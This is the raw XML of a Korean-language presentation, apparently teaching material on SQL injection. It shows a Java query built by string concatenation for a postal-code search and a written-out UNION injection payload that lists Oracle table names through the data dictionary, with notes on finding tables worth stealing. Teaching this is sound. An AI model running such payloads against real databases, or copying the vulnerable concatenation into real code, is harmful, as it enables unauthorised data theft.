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기본 구역" id="{D323D481-ED15-443F-9A66-F25355C0A22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12" autoAdjust="0"/>
    <p:restoredTop sz="96370" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="150" d="100"/>
          <a:sy n="150" d="100"/>
        </p:scale>
        <p:origin x="-7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6912BB8-B06B-48A8-E4C5-CD7E13C07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88869FD-41AE-04A0-D982-EC7EAC549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3FCB706-B354-E5BA-4D3B-7A5E165A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F02D-DDD8-4F25-A58A-71568DC1D09A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ADBDB57-6C7E-EBCE-692B-3CA45152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2554B7A-9ED8-D36D-3B5F-2BF0030F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31A1-AA44-4C66-ACD0-CFFCEAB04D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0969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082B91-4934-E742-47F6-E34F867C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F72A21A-C609-25B3-55A4-1F2F4C019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34C2F3-EAFF-1AF3-C9B2-0164ADD3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F02D-DDD8-4F25-A58A-71568DC1D09A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67E2241-2685-1539-4B95-752EE356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6F2803E-7720-7AB9-9933-3B9C8973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31A1-AA44-4C66-ACD0-CFFCEAB04D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7191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49F7B74-ABC9-F7BD-6732-E0FB1D6C1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BD97DCA-D031-9485-7411-5B25FC6A6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DC3FF38-CBC7-1095-CEEA-85071C903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F02D-DDD8-4F25-A58A-71568DC1D09A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5B30732-F95A-CC12-1820-BE6C1BE6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B95C252-80B2-23ED-176D-C2DCF5C6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31A1-AA44-4C66-ACD0-CFFCEAB04D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4092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89758A0-B92D-4B6B-629E-4DDFEFDE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FA959E-6BA7-5049-325A-B74875DBC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4E37410-83D5-5BA3-AA1D-188F292F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F02D-DDD8-4F25-A58A-71568DC1D09A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022F5C2-3E9F-BB6D-F26A-1690B580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196F5C1-0BE3-18C4-399C-7663C860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31A1-AA44-4C66-ACD0-CFFCEAB04D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8168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0BA2D7E-1B94-40B5-8E70-C513ECBE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C39AFC9-770D-D00E-CA47-16FE881EA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E1D15F1-0BAF-9914-FBB3-B490C274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F02D-DDD8-4F25-A58A-71568DC1D09A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316790C-A7AA-E71C-6FD2-40654D18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DA60C51-8D8F-2965-7C45-4DFCC441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31A1-AA44-4C66-ACD0-CFFCEAB04D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4665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6A1DDB-48B5-0366-BD77-73FE0A7F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78EE9AF-52F0-3EC3-008A-F18567E34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1A61BED-BC32-4BE5-7763-F0C932911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ECB9DDD-31FF-2402-AB97-EBCCD173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F02D-DDD8-4F25-A58A-71568DC1D09A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3B26612-BBB3-50AD-CCF2-14A1A035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4C46DB2-5A35-7204-F83F-E2E780E7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31A1-AA44-4C66-ACD0-CFFCEAB04D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948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025CBD-939F-D953-4CBF-CA189D04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CE3888E-4238-472B-6E78-0021A5653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93A3C1E-F771-F332-0176-566483056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4EF8100-B2B5-0178-F032-946E10340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D982E7C-E462-6127-D1DB-3D0F9AD9B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EC791D01-5717-F911-B8B4-D7137F00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F02D-DDD8-4F25-A58A-71568DC1D09A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06B9278-7BE8-9B06-5F98-0E945EC5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2208C70-2B6D-EB1C-0136-FA4E5907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31A1-AA44-4C66-ACD0-CFFCEAB04D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857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806F29-681A-7830-3B66-0DEBAD65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99ABF5B-8B8F-EFFA-3E53-36EFE4DC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F02D-DDD8-4F25-A58A-71568DC1D09A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AE76D4A-46F8-1AFF-F10A-1BC86BE8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D478942-90A4-8354-7750-2EABE00B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31A1-AA44-4C66-ACD0-CFFCEAB04D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2624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95AC7EF-794A-92B5-6C04-ED28DEBB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F02D-DDD8-4F25-A58A-71568DC1D09A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0ECD1C0E-7E4B-24FE-49F3-04B1FD9B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7D869B-980D-275B-9A7A-FD544CA1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31A1-AA44-4C66-ACD0-CFFCEAB04D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0235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66DE05-DA9C-8B13-A888-6F3E509C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7D649D5-3A7F-8DB6-11AD-8BF26DF23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081855E-C424-AB23-1ADE-2662A12ED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D28BFC1-8467-B9D8-108C-57A4FFA7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F02D-DDD8-4F25-A58A-71568DC1D09A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CC5CA3D-0A51-614F-5F2C-AB38DA71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CA72E20-21DA-42C7-938F-B3F1F1C8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31A1-AA44-4C66-ACD0-CFFCEAB04D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9721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8C060D-1B66-5A0C-B38B-CEEC928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C357B4F5-EA52-5C37-8CB8-B0D607F30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ED54421-A6C9-F6F6-A579-214ECDA5D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AEF0E73-C954-65D4-F16A-57CD0E48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F02D-DDD8-4F25-A58A-71568DC1D09A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9E5F202-CB7D-E25B-5558-F1B97535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68DC981-A50A-287C-3827-433382C6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31A1-AA44-4C66-ACD0-CFFCEAB04D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5569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DE57007D-6B1D-52D4-1E18-92F55564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1954BF0-1514-43E6-54AD-7FE297D5F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B312F0E-402B-5951-B875-2E9A99256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8F02D-DDD8-4F25-A58A-71568DC1D09A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9F1CD56-F4C5-CCA5-1454-9C2C5A3A0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0ADC94-5B76-29E1-7BE0-42CFA6E64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F31A1-AA44-4C66-ACD0-CFFCEAB04D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5940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6D019AB-42EC-1BF2-8461-41C3FB71F24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478172" y="604007"/>
            <a:ext cx="927850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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>SQLInjection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쿼리문을 예측하여 나머지 쿼리문을 외부에서 작성하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입력하여 정보탈취 해킹기법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우편번검색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StringBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>StringBuidler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 err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.append(“select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> “)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.append(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>“)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.append(“ where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>dong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>”).append( dong ).append(“%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>”);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546B329-5397-3ADD-DB9E-A82C74EEEA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730250" y="4222750"/>
            <a:ext cx="3238500" cy="222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E3360CC-D38D-3976-DEB1-425DCEA1F020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863600" y="438150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동이름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6B60DD8-492E-A367-61D0-2200758D05D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555750" y="4425950"/>
            <a:ext cx="1485900" cy="232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07E9719-33B5-92B3-24C4-975E08B619A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093819" y="4425950"/>
            <a:ext cx="551081" cy="232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1FC2622-6877-0265-DD47-1A14B1EEC41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958850" y="4817249"/>
            <a:ext cx="2813050" cy="1374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0EE9C65-933D-66E1-F889-5BED6A327737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4330700" y="43053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상도동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xmlns="" id="{D71C17EC-A885-71D8-BBAB-9F3AD016527D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2031135" y="3683000"/>
            <a:ext cx="2712315" cy="843623"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2305915 w 2712315"/>
              <a:gd name="connsiteY0" fmla="*/ 768350 h 843623"/>
              <a:gd name="connsiteX1" fmla="*/ 2109065 w 2712315"/>
              <a:gd name="connsiteY1" fmla="*/ 520700 h 843623"/>
              <a:gd name="connsiteX2" fmla="*/ 2077315 w 2712315"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 843623"/>
              <a:gd name="connsiteX3" fmla="*/ 2039215 w 2712315"/>
              <a:gd name="connsiteY3" fmla="*/ 476250 h 843623"/>
              <a:gd name="connsiteX4" fmla="*/ 1937615 w 2712315"/>
              <a:gd name="connsiteY4" fmla="*/ 463550 h 843623"/>
              <a:gd name="connsiteX5" fmla="*/ 1848715 w 2712315"/>
              <a:gd name="connsiteY5" fmla="*/ 457200 h 843623"/>
              <a:gd name="connsiteX6" fmla="*/ 1709015 w 2712315"/>
              <a:gd name="connsiteY6" fmla="*/ 444500 h 843623"/>
              <a:gd name="connsiteX7" fmla="*/ 1353415 w 2712315"/>
              <a:gd name="connsiteY7" fmla="*/ 457200 h 843623"/>
              <a:gd name="connsiteX8" fmla="*/ 1289915 w 2712315"/>
              <a:gd name="connsiteY8" fmla="*/ 495300 h 843623"/>
              <a:gd name="connsiteX9" fmla="*/ 1226415 w 2712315"/>
              <a:gd name="connsiteY9" fmla="*/ 527050 h 843623"/>
              <a:gd name="connsiteX10" fmla="*/ 1150215 w 2712315"/>
              <a:gd name="connsiteY10" fmla="*/ 558800 h 843623"/>
              <a:gd name="connsiteX11" fmla="*/ 1029565 w 2712315"/>
              <a:gd name="connsiteY11" fmla="*/ 654050 h 843623"/>
              <a:gd name="connsiteX12" fmla="*/ 927965 w 2712315"/>
              <a:gd name="connsiteY12" fmla="*/ 711200 h 843623"/>
              <a:gd name="connsiteX13" fmla="*/ 877165 w 2712315"/>
              <a:gd name="connsiteY13" fmla="*/ 723900 h 843623"/>
              <a:gd name="connsiteX14" fmla="*/ 826365 w 2712315"/>
              <a:gd name="connsiteY14" fmla="*/ 742950 h 843623"/>
              <a:gd name="connsiteX15" fmla="*/ 781915 w 2712315"/>
              <a:gd name="connsiteY15" fmla="*/ 762000 h 843623"/>
              <a:gd name="connsiteX16" fmla="*/ 642215 w 2712315"/>
              <a:gd name="connsiteY16" fmla="*/ 831850 h 843623"/>
              <a:gd name="connsiteX17" fmla="*/ 566015 w 2712315"/>
              <a:gd name="connsiteY17" fmla="*/ 838200 h 843623"/>
              <a:gd name="connsiteX18" fmla="*/ 89765 w 2712315"/>
              <a:gd name="connsiteY18" fmla="*/ 787400 h 843623"/>
              <a:gd name="connsiteX19" fmla="*/ 38965 w 2712315"/>
              <a:gd name="connsiteY19" fmla="*/ 755650 h 843623"/>
              <a:gd name="connsiteX20" fmla="*/ 865 w 2712315"/>
              <a:gd name="connsiteY20" fmla="*/ 654050 h 843623"/>
              <a:gd name="connsiteX21" fmla="*/ 38965 w 2712315"/>
              <a:gd name="connsiteY21" fmla="*/ 501650 h 843623"/>
              <a:gd name="connsiteX22" fmla="*/ 134215 w 2712315"/>
              <a:gd name="connsiteY22" fmla="*/ 412750 h 843623"/>
              <a:gd name="connsiteX23" fmla="*/ 273915 w 2712315"/>
              <a:gd name="connsiteY23" fmla="*/ 330200 h 843623"/>
              <a:gd name="connsiteX24" fmla="*/ 439015 w 2712315"/>
              <a:gd name="connsiteY24" fmla="*/ 298450 h 843623"/>
              <a:gd name="connsiteX25" fmla="*/ 553315 w 2712315"/>
              <a:gd name="connsiteY25" fmla="*/ 273050 h 843623"/>
              <a:gd name="connsiteX26" fmla="*/ 737465 w 2712315"/>
              <a:gd name="connsiteY26" fmla="*/ 247650 h 843623"/>
              <a:gd name="connsiteX27" fmla="*/ 1791565 w 2712315"/>
              <a:gd name="connsiteY27" fmla="*/ 234950 h 843623"/>
              <a:gd name="connsiteX28" fmla="*/ 2020165 w 2712315"/>
              <a:gd name="connsiteY28" fmla="*/ 228600 h 843623"/>
              <a:gd name="connsiteX29" fmla="*/ 2083665 w 2712315"/>
              <a:gd name="connsiteY29" fmla="*/ 222250 h 843623"/>
              <a:gd name="connsiteX30" fmla="*/ 2267815 w 2712315"/>
              <a:gd name="connsiteY30" fmla="*/ 209550 h 843623"/>
              <a:gd name="connsiteX31" fmla="*/ 2356715 w 2712315"/>
              <a:gd name="connsiteY31" fmla="*/ 177800 h 843623"/>
              <a:gd name="connsiteX32" fmla="*/ 2445615 w 2712315"/>
              <a:gd name="connsiteY32" fmla="*/ 139700 h 843623"/>
              <a:gd name="connsiteX33" fmla="*/ 2490065 w 2712315"/>
              <a:gd name="connsiteY33" fmla="*/ 120650 h 843623"/>
              <a:gd name="connsiteX34" fmla="*/ 2521815 w 2712315"/>
              <a:gd name="connsiteY34" fmla="*/ 107950 h 843623"/>
              <a:gd name="connsiteX35" fmla="*/ 2578965 w 2712315"/>
              <a:gd name="connsiteY35" fmla="*/ 95250 h 843623"/>
              <a:gd name="connsiteX36" fmla="*/ 2617065 w 2712315"/>
              <a:gd name="connsiteY36" fmla="*/ 69850 h 843623"/>
              <a:gd name="connsiteX37" fmla="*/ 2667865 w 2712315"/>
              <a:gd name="connsiteY37" fmla="*/ 44450 h 843623"/>
              <a:gd name="connsiteX38" fmla="*/ 2712315 w 2712315"/>
              <a:gd name="connsiteY38" fmla="*/ 0 h 84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712315" h="843623">
                <a:moveTo>
                  <a:pt x="2305915" y="768350"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2240298" y="685800"/>
                  <a:pt x="2191409" y="586575"/>
                  <a:pt x="2109065" y="520700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2098482" y="512233"/>
                  <a:pt x="2088749" y="502576"/>
                  <a:pt x="2077315" y="495300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2065336" y="487677"/>
                  <a:pt x="2052786" y="480426"/>
                  <a:pt x="2039215" y="476250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2029307" y="473202"/>
                  <a:pt x="1941105" y="463854"/>
                  <a:pt x="1937615" y="463550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1908018" y="460976"/>
                  <a:pt x="1878321" y="459667"/>
                  <a:pt x="1848715" y="457200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1709015" y="444500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1590482" y="448733"/>
                  <a:pt x="1471162" y="442928"/>
                  <a:pt x="1353415" y="457200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1328910" y="460170"/>
                  <a:pt x="1311544" y="483404"/>
                  <a:pt x="1289915" y="495300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1269179" y="506705"/>
                  <a:pt x="1247959" y="517257"/>
                  <a:pt x="1226415" y="527050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1201365" y="538436"/>
                  <a:pt x="1173337" y="543882"/>
                  <a:pt x="1150215" y="558800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1107159" y="586578"/>
                  <a:pt x="1072198" y="625628"/>
                  <a:pt x="1029565" y="654050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="991679" y="679307"/>
                  <a:pt x="974256" y="693198"/>
                  <a:pt x="927965" y="711200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="911697" y="717526"/>
                  <a:pt x="893825" y="718694"/>
                  <a:pt x="877165" y="723900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="859903" y="729294"/>
                  <a:pt x="843156" y="736233"/>
                  <a:pt x="826365" y="742950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="811398" y="748937"/>
                  <a:pt x="796108" y="754357"/>
                  <a:pt x="781915" y="762000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="730799" y="789524"/>
                  <a:pt x="714831" y="825799"/>
                  <a:pt x="642215" y="831850"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="566015" y="838200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="252765" y="828095"/>
                  <a:pt x="265971" y="879698"/>
                  <a:pt x="89765" y="787400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72076" y="778134"/>
                  <a:pt x="55898" y="766233"/>
                  <a:pt x="38965" y="755650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22606" y="726204"/>
                  <a:pt x="-5266" y="692061"/>
                  <a:pt x="865" y="654050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9203" y="602355"/>
                  <a:pt x="18715" y="549939"/>
                  <a:pt x="38965" y="501650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43159" y="491649"/>
                  <a:pt x="127957" y="416922"/>
                  <a:pt x="134215" y="412750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179220" y="382747"/>
                  <a:pt x="220799" y="340415"/>
                  <a:pt x="273915" y="330200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="439015" y="298450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="477253" y="290629"/>
                  <a:pt x="515044" y="280704"/>
                  <a:pt x="553315" y="273050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="593280" y="265057"/>
                  <a:pt x="705209" y="248355"/>
                  <a:pt x="737465" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1791565" y="234950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2020165" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2041417" y="227676"/>
                  <a:pt x="2062443" y="223714"/>
                  <a:pt x="2083665" y="222250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2300238" y="207314"/>
                  <a:pt x="2124796" y="223852"/>
                  <a:pt x="2267815" y="209550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2301975" y="198163"/>
                  <a:pt x="2321881" y="192050"/>
                  <a:pt x="2356715" y="177800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2386555" y="165593"/>
                  <a:pt x="2415982" y="152400"/>
                  <a:pt x="2445615" y="139700"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2490065" y="120650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2500587" y="116266"/>
                  <a:pt x="2510688" y="110423"/>
                  <a:pt x="2521815" y="107950"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2578965" y="95250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2591665" y="86783"/>
                  <a:pt x="2603813" y="77423"/>
                  <a:pt x="2617065" y="69850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2633503" y="60457"/>
                  <a:pt x="2652598" y="55646"/>
                  <a:pt x="2667865" y="44450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2684762" y="32059"/>
                  <a:pt x="2712315" y="0"/>
                  <a:pt x="2712315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5ADEE02-0C24-D9EE-E92D-D13D7A73D01D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4406900" y="4703981"/>
            <a:ext cx="65998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생성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>쿼리문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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where dong like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>상도동</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>%’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용하여 쿼리문을 붙임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Error : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼의 개수가 맞지 않거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼의 데이터형이 다를 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4746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BE0B39C-DFE5-7C72-217E-401AAA86E496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596900" y="608231"/>
            <a:ext cx="9788257" cy="7571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생성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>쿼리문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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where dong like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>상도동</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>%’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Error : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼의 개수가 맞지 않거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>컬럼의 데이터형이 다를 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0.DD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>지식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테이블명을 검색 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DD : tab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테이블에 존재하는 컬럼 정보 얻는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DD : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>user_tab_cols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테이블정보를 얻기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where dong like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>‘ union select tname,’0’,’0’,’0’,’0’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>tab --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> %’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 되어 실행되면 모든 테이블명이 검색된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>정보가 있을 만한 테이블을 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
